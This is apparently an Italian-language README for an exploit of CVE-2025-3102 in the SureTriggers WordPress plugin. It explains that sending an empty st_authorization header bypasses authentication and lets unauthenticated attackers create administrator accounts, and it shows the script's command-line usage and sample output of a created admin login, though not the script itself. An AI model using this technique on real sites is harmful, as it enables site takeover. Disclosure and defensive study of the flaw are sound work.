
Wordpress SureTriggers <= 1.0.78 - Bypass dell'autorizzazione causato dalla mancata verifica dei valori vuoti che permette la creazione non autenticata di utenti amministrativi
🚨 CVE-2025-3102 è una vulnerabilità critica di bypass dell'autenticazione che colpisce il plugin WordPress SureTriggers: All-in-One Automation Platform, installato attivamente su oltre 100.000 siti web. A causa della natura del difetto e dell'ampia diffusione, questa vulnerabilità rappresenta un rischio di sicurezza significativo.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HIl plugin SureTriggers per WordPress è vulnerabile a un bypass dell'autenticazione che consente ad attaccanti non autenticati di creare account amministratore. Ciò è dovuto a una mancanza del controllo dei valori vuoti su secret_key all'interno della funzione autheticate_user.
Quando il plugin è installato e attivato ma non configurato con una chiave API, gli attaccanti possono aggirare l'autenticazione inviando un header st_authorization vuoto, attivando azioni riservate agli utenti autenticati.
Viene fornito uno script Python per automatizzare lo sfruttamento di questa vulnerabilità.
Questo script consente di generare un nuovo utente amministratore sui siti vulnerabili.
readme.txtst_authorization vuotousage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Questo script è fornito solo a scopo educativo.
L'uso non autorizzato di questo codice contro target senza esplicita autorizzazione è illegale.
L'autore non si assume alcuna responsabilità per abusi o danni causati.
Di: Nxploited ( Khaled Alenazi )